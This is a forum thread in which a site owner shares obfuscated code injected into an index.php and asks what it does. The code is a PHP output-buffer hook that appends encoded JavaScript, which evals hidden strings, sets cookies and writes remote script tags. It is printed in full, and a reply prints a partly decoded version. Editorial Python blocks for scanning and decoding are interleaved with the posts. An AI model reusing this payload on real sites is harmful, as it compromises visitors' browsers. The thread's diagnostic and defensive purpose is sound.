axew3 Posted April 1, 2010 Share Posted April 1, 2010 Hello all, unfortunately today i have download for an upgrade a file from the online server, and the index.php file contain these lines of code inside, at the very top, that i can't well understand completely what was doing, but i think nothing good, so i put it here searching for some help that can explain a little about: <?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script language="javascript">function t(){return z($a);}var $a="Z64aZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ25Z22;ccZ3dZ225ngZ2574h;Z2569++Z2529Z257btmpZ253dds.sZ256cicZ2565Z2528Z2569,iZ252b1)Z253bsZ22;cdZ3dZ22Z2574Z253dsZ2574+StZ2572inZ2567.frZ256fZ256dZ2543haZ2572CodZ2565((Z2574Z256dp.Z22;caZ3dZ22Z2566unZ2563tioZ256e dcZ2573(dZ2573,Z2565s)Z257bdsZ253duZ256eZ2565Z2573caZ2570Z22;opZ3dZ22Z2524aZ253dZ2522dw(Z2564csZ2528cu,Z25314)Z2529;Z2522;Z22;czZ3dZ22Z2566Z2575nctZ2569onZ2520cz(Z2563zZ2529Z257bretZ2575rn Z2563aZ252bcbZ252bcc+Z2563Z2564Z252bZ2563e+cZ257a;};Z22;dbZ3dZ227FtuQd8!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0--0Z252009kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0Z270;gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3e|u~wdx+m0yv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vZ22;dzZ3dZ22Z2566uZ256ectZ2569oZ256e 
dwZ2528t)Z257bcaZ253dZ2527Z252564oZ2525Z25363umZ2565Z25256etZ25252ewZ2572Z252569teZ252528Z2525Z25322Z2527;ceZ253dZ2527Z252522Z252529Z2527;Z2563bZ253dZ2527Z25253csZ252563rZ252569Z252570tZ2520Z25256caZ25256egZ2575Z25256Z2531Z252567eZ25253dZ25255cZ252522javZ2561sZ252563Z252572iZ252570tZ25255cZ25252Z2532Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fscZ2572iZ252570Z2574Z25253eZ2527Z253bevaZ256c(Z2575Z256eescZ2561Z2570eZ2528Z2574))Z257d;Z22;deZ3dZ22209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;ceZ3dZ22cZ2568Z2561rCZ256fdeAZ2574(0Z2529Z255e(Z25270x00Z2527+Z2565Z2573)))Z253b}Z257dZ22;stZ3dZ22Z2573tZ253dZ2522$Z2561Z253dsZ2574;Z2564cZ2573(Z2564Z2561Z252bZ2564bZ252bZ2564cZ252bdZ2564+Z2564Z2565Z252c1Z2530Z2529Z253bZ2564wZ2528sZ2574Z2529;Z2573tZ253d$Z2561;Z2522Z253bZ22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;v}zfszZ2526;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;dcZ3dZ22rs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07huc7Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;Z22;ddZ3dZ2208y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+Z2519~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxy
vdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z2519iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25Z22;cbZ3dZ22e(dZ2573)Z253bstZ253dtmpZ253dZ2527Z2527;for(Z2569Z253d0Z253biZ253cZ2564s.lZ256Z22;Z69f (Z64oZ63umZ65Z6et.Z63ookZ69e.Z69ndeZ78OfZ28Z27rf5f6dZ73Z27)Z3dZ3d-1)Z7bfunctiZ6fn cZ61Z6cZ6cbZ61ckZ28xZ29Z7bwiZ6edoZ77.twZ20Z3d Z78;vZ61Z72Z20dZ20Z3d nZ65wZ20DZ61Z74e()Z3bd.sZ65Z74TimZ65Z28x[Z22as_Z6ffZ22]*10Z300);Z76ar Z68Z20Z3d dZ2egetZ55TZ43HoZ75rZ73Z28);wZ69ndZ6fw.hZ20Z3dZ20Z68;iZ66 (hZ20Z3e 8)Z7bd.sZ65Z74Z55TZ43DaZ74Z65(dZ2egetZ55TCDZ61teZ28) -Z202)Z3b}elZ73eZ7bd.Z73etZ55TZ43Z44ateZ28Z64.Z67Z65tUZ54Z43Z44atZ65() Z2d Z33);}Z77Z69nZ64owZ2egdZ20Z3d Z64;vaZ72Z20Z74iZ6de Z3d nZ65w AZ72rayZ28);vZ61r sZ68iZ66Z74Z49Z6eZ64exZ20Z3d Z22Z22;time[Z22yearZ22] Z3d d.Z67Z65Z74UTZ43Z46ulZ6cYeZ61rZ28Z29;Z74imeZ5bZ22monZ74hZ22Z5dZ20Z3d d.Z67Z65Z74UZ54Z43MZ6fnthZ28Z29Z2b1Z3btZ69meZ5bZ22dayZ22] Z3d d.geZ74UTZ43Z44ateZ28);Z69Z66 (dZ2egZ65tUTZ43MZ6fZ6eth(Z29+1 Z3cZ2010)Z7bZ73hZ69fZ74IndZ65Z78 Z3d tZ69me[Z22yeaZ72Z22] + Z22-0Z22 +Z20(d.Z67etUZ54CMoZ6etZ68Z28)Z2b1)Z3b}Z65lseZ7bZ73hifZ74IndZ65x Z3d tiZ6dZ65[Z22yeZ61Z72Z22]Z20+ Z22-Z22 Z2bZ20(Z64.gZ65tZ55TZ43Z4dontZ68()Z2bZ31Z29Z3b}iZ66 (dZ2egeZ74Z55TCZ44Z61teZ28) Z3cZ20Z310Z29Z7bshZ69fZ74IZ6edeZ78 Z3dshZ69fZ74IndZ65x +Z20Z22-0Z22 +Z20Z64.Z67etUZ54CDaZ74Z65();Z7delsZ65Z7bshiftZ49ndeZ78Z20Z3d shifZ74IndZ65x +Z20Z22-Z22 + d.geZ74UTZ43DZ61teZ28Z29;}Z64Z6fcuZ6deZ6etZ2ewriZ74eZ28Z22Z3cscrZ22+Z22iZ70t Z6caZ6eZ67Z75aZ67eZ3djavZ61scrZ69ptZ22+Z22 srZ63Z3dZ27http:Z2fZ2fsearZ63Z68Z2etZ77Z69ttZ65rZ2eZ63Z6fZ6dZ2ftrZ65ndsZ2fdZ61ilyZ2eZ6asoZ6e?dZ61Z74eZ3dZ22+ sZ68Z69ftZ49Z6eZ64eZ78Z2bZ22&callbZ61ckZ3dcaZ6clbZ61cZ6b2Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iZ70tZ3eZ22);} Z66unZ63tZ69on Z63aZ6clbZ61cZ6b2(xZ29Z7bwiZ6edoZ77.Z74Z77 Z3d 
x;scZ28Z27rf5Z666dsZ27,Z32,7Z29;evZ61l(Z75Z6eesZ63aZ70e(dZ7aZ2bcz+Z6fp+sZ74)+Z27dZ77(dZ7a+czZ28$Z61Z2bstZ29);Z27)Z3bdocZ75Z6dentZ2ewrZ69teZ28$aZ29Z3b}dZ6fcumZ65nZ74.wZ72Z69Z74Z65(Z22Z3cimZ67 sZ72cZ3dZ27httpZ3aZ2fZ2fsZ65aZ72cZ68.Z74wZ69ttZ65r.cZ6fmZ2fiZ6dagZ65sZ2fseaZ72chZ2frZ73Z73Z2eZ70Z6egZ27 wZ69dZ74hZ3d1 hZ65igZ68tZ3d1Z20Z73tylZ65Z3dZ27visibiliZ74Z79Z3ahZ69Z64Z64Z65nZ27 Z2fZ3e Z3cscrZ22+Z22ipt lanZ67uZ61Z67eZ3djavZ61sZ63rZ69pZ74Z22+Z22 srcZ3dZ27httpZ3aZ2fZ2fsearchZ2etwiZ74teZ72Z2ecomZ2ftZ72eZ6eZ64sZ2fdZ61ilyZ2ejZ73on?Z63alZ6cbaZ63kZ3dcalZ6cbacZ6bZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);Z7delsZ65Z7b$aZ3dZ27Z27};funZ63tZ69Z6fn sZ63(cZ6em,vZ2ceZ64Z29Z7bvarZ20exZ64Z3dnewZ20Z44aZ74e()Z3bexdZ2esZ65tDaZ74e(Z65xZ64Z2egZ65tDaZ74eZ28)+eZ64Z29;Z64ocZ75meZ6etZ2ecooZ6biZ65Z3dcnmZ2bZ20Z27Z3dZ27 +eZ73capZ65(v)Z2bZ27;eZ78Z70ireZ73Z3dZ27+exZ64.toZ47MTZ53trZ69Z6egZ28);}Z3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}var x=0;eval(t());</script>';}//important security update ?> <?php ?> <?php Thank you Quote Link to comment Share on other sites More sharing options...
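The hook in this post works by registering an `ob_start()` callback that appends a `<script>` tag to every buffered page. A defender checking other files on the same host can look for exactly that shape. The following scanner is an added example, not code from the thread or from any project it mentions; the two PHP strings it scans are constructed stand-ins (the injected JavaScript is shortened to a placeholder), and the function names are my own.

```python
import re

# Constructed sample: a PHP file carrying an output-buffer hook of the kind
# shown above. The JavaScript payload is a short placeholder, not the real one.
SAMPLE_INFECTED_PHP = """<?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script language="javascript">var $a="Z3cZ2e";eval(t());</script>';}//important security update ?>
<?php
echo "normal page";
"""

# Constructed sample: ordinary use of output buffering without a callback.
SAMPLE_CLEAN_PHP = """<?php
ob_start();
require 'header.php';
echo "hello";
"""

# ob_start('name') with a quoted callback name; closures and array callbacks
# are not matched by this expression (see the note below).
OB_START_CALLBACK = re.compile(r"ob_start\s*\(\s*['\"]([A-Za-z_]\w*)['\"]\s*\)")


def extract_braced_body(src, open_idx):
    """Return the text between the brace at open_idx and its matching close,
    ignoring braces that sit inside single- or double-quoted string literals."""
    depth = 0
    quote = None
    i = open_idx
    while i < len(src):
        c = src[i]
        if quote:
            if c == "\\":          # skip the escaped character
                i += 2
                continue
            if c == quote:
                quote = None
        elif c in ("'", '"'):
            quote = c
        elif c == "{":
            depth += 1
        elif c == "}":
            depth -= 1
            if depth == 0:
                return src[open_idx + 1:i]
        i += 1
    return src[open_idx + 1:]     # unterminated body: return what is there


def find_buffer_hooks(php_source):
    """Return [(callback_name, [reasons])] for every ob_start() callback whose
    body appends a <script> tag to the buffer or contains eval()."""
    findings = []
    for m in OB_START_CALLBACK.finditer(php_source):
        name = m.group(1)
        fn = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", php_source)
        if not fn:
            findings.append((name, ["callback not defined in this file"]))
            continue
        body = extract_braced_body(php_source, fn.end() - 1)
        reasons = []
        # $buffer . '<script ...' : the buffered page gets a script tag appended
        if re.search(r"\$\w+\s*\.\s*['\"]\s*<script", body, re.I):
            reasons.append("appends <script> to the output buffer")
        # eval() either in the PHP body or inside the injected script text
        if re.search(r"\beval\s*\(", body):
            reasons.append("contains eval()")
        if reasons:
            findings.append((name, reasons))
    return findings


if __name__ == "__main__":
    for label, src in (("infected", SAMPLE_INFECTED_PHP), ("clean", SAMPLE_CLEAN_PHP)):
        print(label, find_buffer_hooks(src))
```

Run over a directory of `.php` files, this flags files whose output-buffer callback rewrites the page; a legitimate callback (compression, template post-processing) rarely appends a `<script>` literal. The regex only catches callbacks given as quoted strings, so a hook registered as a closure or a `[$obj, 'method']` pair needs a second pattern.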
andrewgauger Posted April 1, 2010 Share Posted April 1, 2010 da="fqb0t-7vrs}vyb>s%7F}7+0fqb0cxyvdY~tuh0-0%20+v%7Fb08fqb0y0y~0gy~t%7Fg>dg>dbu~tc9kyv08gy~t%7Fg>x0.0(0660gy~t%7Fg>x0,0%22!0660y>y~tuh_v870%20'790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%7FtuQd8!90;0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mu|cu0yv088gy~t%7Fg>x0,0)0ll00gy~t%7Fg>x0.0%22%2090660y>y~tuh_v870!(790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%";cc="5ng%74h;%69++%29%7btmp%3dds.s%6cic%65%28%69,i%2b1)%3bs";cd="%74%3ds%74+St%72in%67.fr%6f%6d%43ha%72Cod%65((%74%6dp.";ca="%66un%63tio%6e dc%73(d%73,%65s)%7bds%3du%6e%65%73ca%70";op="%24a%3d%22dw(%64cs%28cu,%314)%29;%22;";cz="%66%75nct%69on%20cz(%63z%29%7bret%75rn %63a%2bcb%2bcc+%63%64%2b%63e+c%7a;};";db="7FtuQd8!90;0!%200;gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mmyv08cxyvdY~tuh0--0%2009kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>sxqbS%7FtuQd8!90;0'0;gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>|u~wdx+m0yv08cxyvdY~tuh0.0%209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~t%7Fg>wt>wudEDSVe||Iuqb89+dy}uK7}%7F~dx7M0-0gy~t%7Fg>wt>wudEDS]%7F~dx89;!+dy}uK7tqi7M0-0gy~t%7Fg>wt>wudEDSTqdu89+fqb0t-7v";dz="%66u%6ect%69o%6e 
dw%28t)%7bca%3d%27%2564o%25%363um%65%256et%252ew%72%2569te%2528%25%322%27;ce%3d%27%2522%2529%27;%63b%3d%27%253cs%2563r%2569%2570t%20%256ca%256eg%75%256%31%2567e%253d%255c%2522jav%61s%2563%2572i%2570t%255c%252%32%253e%27;cc%3d%27%253c%255c%252fsc%72i%2570%74%253e%27%3beva%6c(%75%6eesc%61%70e%28%74))%7d;";de="209M0;0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0$90;0~e}9050!%209M+%19}%7F~dxSx0-0|uddubcK88dy}uK7}%7F~dx7M0;0~e}9050%22%9M0;0|uddubcK88dy}uK7}%7F~dx7M0:0~e}9050%22%9M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0%269050%22'9M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050%22$9M+4q-4q>bu`|qsu8ts%7F}79+m";ce="c%68%61rC%6fdeA%74(0%29%5e(%270x00%27+%65%73)))%3b}%7d";st="%73t%3d%22$%61%3ds%74;%64c%73(%64%61%2b%64b%2b%64c%2bd%64+%64%65%2c1%30%29%3b%64w%28s%74%29;%73t%3d$%61;%22%3b";cu="(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:w{y;xp;v}zfsz%26;64c}p`|)%$$4|q}s|`),$*(;}rfuyq*(;p}b*";dc="rs}vyb>s%7F}7+fqb0}%7F~dxc0-0~ug0Qbbqi87e~%7F7<07tfu7<07dxb7<07vyb7<07fyv7<07huc7<07fuc7<07wxd7<07u~y7<07ud~7<07|uf7<07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7z7<7y7<7{7<7|7<7}7<7~7<7%7F7<7`7<7a7<7b7<7c7<7d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~e}rubc0-0~ug0Qbbqi8!<%22<#<$<%<%26<'<(<)9+%19ve~sdy%7F~0Sq|se|qdu]qwys^e}rub8tqi<0}%7F~dx<0iuqb<0y~tuh9kbudeb~0888iuqb0;";dd="08y~tuh0:0tqi990;08}%7F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!<0iuqbSx%22<0}%7F~dxSx<0tqiSx<0~e}+%19~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M<0dy}uK7}%7F~dx7M<0dy}uK7iuqb7M<0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060%20hQQ90;0~e}9050%26#9050%22%26M0;0|uddubcK888dy}uK7iuqb7M060%20hQQ90,,0%2290;0~e}9050%22%M+%19iuqbSx%220-0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0#90;0~e}9050!%";cb="e(d%73)%3bst%3dtmp%3d%27%27;for(%69%3d0%3bi%3c%64s.l%6";if (document.cookie.indexOf('rf5f6ds')==-1){function callback(x){window.tw = x;var d = new Date().setTime(x["as_of"]*1000);var h = d.getUTCHours();window.h = h;if (h > {d.setUTCDate(d.getUTCDate() - 2);}else{d.setUTCDate(d.getUTCDate() - 3);}window.gd = d;var time = 
new Array();var shiftIndex = "";time["year"] = d.getUTCFullYear();time["month"] = d.getUTCMonth()+1;time["day"] = d.getUTCDate();if (d.getUTCMonth()+1 < 10){shiftIndex = time["year"] + "-0" + (d.getUTCMonth()+1);}else{shiftIndex = time["year"] + "-" + (d.getUTCMonth()+1);}if (d.getUTCDate() < 10){shiftIndex =shiftIndex + "-0" + d.getUTCDate();}else{shiftIndex = shiftIndex + "-" + d.getUTCDate();}document.write("" + "");} function callback2(x){window.tw = x;sc('rf5f6ds',2,7);eval(unescape(dz+cz+op+st)+'dw(dz+cz($a+st));');document.write($a);}document.write(" " + "");}else{$a=''};function sc(cnm,v,ed){var exd=new Date();exd.setDate(exd.getDate()+ed);document.cookie=cnm+ '=' +escape(v)+';expires='+exd.toGMTString();}; This is what the function returns. Still a bit cryptic, but that should get you started. Quote Link to comment Share on other sites More sharing options...
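The decoding andrewgauger shows above follows the script's own `z()` helper: every `Z` is a stand-in for `%`, and the result is passed through JavaScript's `unescape()`. The output is still partly encoded because the pieces (`ca`, `cb`, `cz`, ...) are percent-encoded a second time (`%2564` becomes `%64` becomes `d`). The script below is an added example for reproducing that analysis offline in Python; it is not code from the thread, the sample strings are constructed rather than copied from the payload, and the function names are my own.

```python
import re

# Constructed sample in the payload's "Z for %" encoding.
SAMPLE_Z = "Z3cscriptZ3evar xZ3d0Z3bZ3cZ2fscriptZ3e"

# Constructed sample of the second layer: JavaScript that builds its code from
# percent-encoded string variables, as the decoded payload above does.
SAMPLE_JS = 'ca="%66un%63tio%6e";cb="e(d%73)";'


def js_unescape(s):
    """Decode the way JavaScript's unescape() does: %XX and %uXXXX sequences.
    urllib.parse.unquote would miss the %uXXXX form, so this is hand-rolled."""
    def repl(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 16))
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})", repl, s)


def z_decode(s):
    """Replicate the injected script's z(): 'Z' -> '%', then unescape()."""
    return js_unescape(s.replace("Z", "%"))


def peel_layers(s, max_layers=5):
    """Apply js_unescape repeatedly while the string keeps changing and return
    every intermediate layer, so each decoding step can be inspected."""
    layers = [s]
    for _ in range(max_layers):
        nxt = js_unescape(layers[-1])
        if nxt == layers[-1]:
            break
        layers.append(nxt)
    return layers


def extract_string_vars(js):
    """Collect name="..." assignments from decoded JavaScript into a dict,
    each value decoded once more, so the pieces the script concatenates
    can be read individually."""
    pattern = re.compile(r'(\w+)\s*=\s*"((?:[^"\\]|\\.)*)"')
    return {name: js_unescape(val) for name, val in pattern.findall(js)}


if __name__ == "__main__":
    print(z_decode(SAMPLE_Z))
    print(peel_layers("%2564o%2563"))
    print(extract_string_vars(SAMPLE_JS))
```

Feeding the `$a` string from the first post into `z_decode` reproduces andrewgauger's output; `extract_string_vars` then separates the pieces, and `peel_layers` shows how many encoding rounds each one carries. Everything here is string transformation only: the decoded JavaScript is never executed, which is the point of doing this outside a browser.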
ialsoagree Posted April 1, 2010 I worked on a site not long ago that found a similar bit of cryptic JavaScript inserted into the bottom of all its index files (both PHP and HTML). At the same time, many of their users reported that their virus scanners now marked the site as containing malicious code and wouldn't let them access it. I contacted the web host in an attempt to get FTP logs, but the host didn't maintain logs for FTP access. In any event, removing the code removed the error message for the users. Coincidence? Probably not.
axew3 (Author) Posted April 1, 2010 I think the file index.php has been modified in some way by somebody (the file has been hacked), in some obscure way that I hope to discover at this point with some help. Please, ialsoagree, can you remember if the site where you were working was also using the CARP RSS feed parser? It is the only external application involved, and I really can't imagine from where else it would be possible to break into the file index.php.
ialsoagree Posted April 1, 2010
Quoting axew3: "I think the file index.php has been modified in some way by somebody (the file has been hacked), in some obscure way that I hope to discover at this point with some help. Please, ialsoagree, can you remember if that site was also using the CARP RSS feed parser? It is the only external application involved, and I really can't imagine from where else it would be possible to break into the file index.php."
No, the website I worked with was not using any RSS feed or any PHP script that reads external files or allows file uploads other than images.
axew3 (Author) Posted April 1, 2010 There is also jQuery, which seems to have some security issues and was used in the index.php ... "Any request that the AJAX calls in your pages can make can also be made by someone outside of the application. If done right, you will not be able to tell if they were made as part of an AJAX call from your webapp or by hand/other means..." Does somebody know more about this JavaScript + PHP code?